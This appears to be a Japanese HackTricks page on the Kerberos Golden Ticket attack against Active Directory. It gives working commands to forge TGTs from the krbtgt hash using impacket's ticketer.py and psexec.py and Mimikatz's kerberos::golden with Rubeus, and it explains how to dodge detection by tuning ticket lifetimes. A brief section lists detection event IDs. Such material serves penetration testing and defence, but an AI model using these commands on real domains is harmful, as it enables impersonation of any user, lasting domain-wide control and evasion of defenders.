7.1 KiB
ゴールデンチケット
AWSハッキングをゼロからヒーローまで学ぶ htARTE (HackTricks AWS Red Team Expert)!
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式PEASS & HackTricksグッズを入手する
- PEASSファミリーを発見し、独占的なNFTsのコレクションをチェックする
- 💬 Discordグループに参加するか、テレグラムグループに参加する、またはTwitter 🐦 @carlospolopmをフォローする。
- HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
ゴールデンチケット
krbtgt ADアカウントのNTLMハッシュを使用して、有効な任意のユーザーのTGTを作成できます。TGSではなくTGTを偽造する利点は、ドメイン内の任意のサービス(またはマシン)にアクセスし、なりすましたユーザーとして行動できることです。 さらに、krbtgtの資格情報は自動的に変更されることはありません。
krbtgtアカウントのNTLMハッシュは、ドメイン内の任意のDCのlsassプロセスまたはNTDS.ditファイルから取得できます。また、lsadump::dcsyncモジュールのMimikatzやimpacketの例secretsdump.pyを使用して、DCsync攻撃を通じてそのNTLMを取得することも可能です。通常、使用される技術に関係なく、ドメイン管理者権限または同様の権限が必要です。
また、AES Kerberosキー(AES128およびAES256)を使用してチケットを偽造することが可能であり、かつ望ましい(運用上の安全性)ことも考慮する必要があります。
{% code title="Linuxから" %}
python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass
{% endcode %}
{% code title="Windowsから" %}
#mimikatz
kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
.\Rubeus.exe ptt /ticket:ticket.kirbi
klist #List tickets in memory
# Example using aes key
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:430b2fdb13cc820d73ecf123dddd4c9d76425d4c2156b89ac551efb9d591a439 /ticket:golden.kirbi
{% endcode %}
ゴールデンチケットを注入したら、共有ファイル**(C$)**にアクセスし、サービスやWMIを実行できるため、psexec や wmiexec を使用してシェルを取得できます(winrm経由ではシェルを取得できないようです)。
一般的な検出を回避する
ゴールデンチケットを検出する最も一般的な方法は、ネットワーク上でのKerberosトラフィックを検査することです。デフォルトでは、MimikatzはTGTを10年間有効に署名しますが、これは後続のTGSリクエストで異常として目立ちます。
Lifetime : 3/11/2021 12:39:57 PM ; 3/9/2031 12:39:57 PM ; 3/9/2031 12:39:57 PM
開始オフセット、期間、最大更新回数(すべて分単位)を制御するには、/startoffset、/endin、/renewmax パラメータを使用します。
Get-DomainPolicy | select -expand KerberosPolicy
残念ながら、TGTの寿命は4769のイベントログに記録されていないため、この情報はWindowsイベントログには見つかりません。しかし、4769のイベントが事前の4768なしに見られることを相関させることができます。TGSをTGTなしで要求することは不可能であり、TGTが発行された記録がない場合、オフラインで偽造されたと推測できます。
この検出を回避するためには、ダイヤモンドチケットを確認してください:
{% content-ref url="diamond-ticket.md" %} diamond-ticket.md {% endcontent-ref %}
軽減策
- 4624: アカウントログオン
- 4672: 管理者ログオン
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List –Property
防御者が行うことができる他の小さなトリックは、デフォルトのドメイン管理者アカウントなどの敏感なユーザーに対する4769のアラートです。
ired.teamでGolden Ticketについての詳細情報。
AWSのハッキングをゼロからヒーローまで学ぶには、 htARTE (HackTricks AWS Red Team Expert)をご覧ください!
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式のPEASS & HackTricksグッズを手に入れましょう。
- The PEASS Familyを発見し、独占的なNFTsのコレクションをご覧ください。
- 💬 Discordグループやテレグラムグループに参加するか、Twitter 🐦 @carlospolopmでフォローしてください。
- HackTricksのGitHubリポジトリやHackTricks CloudにPRを提出して、あなたのハッキングのコツを共有してください。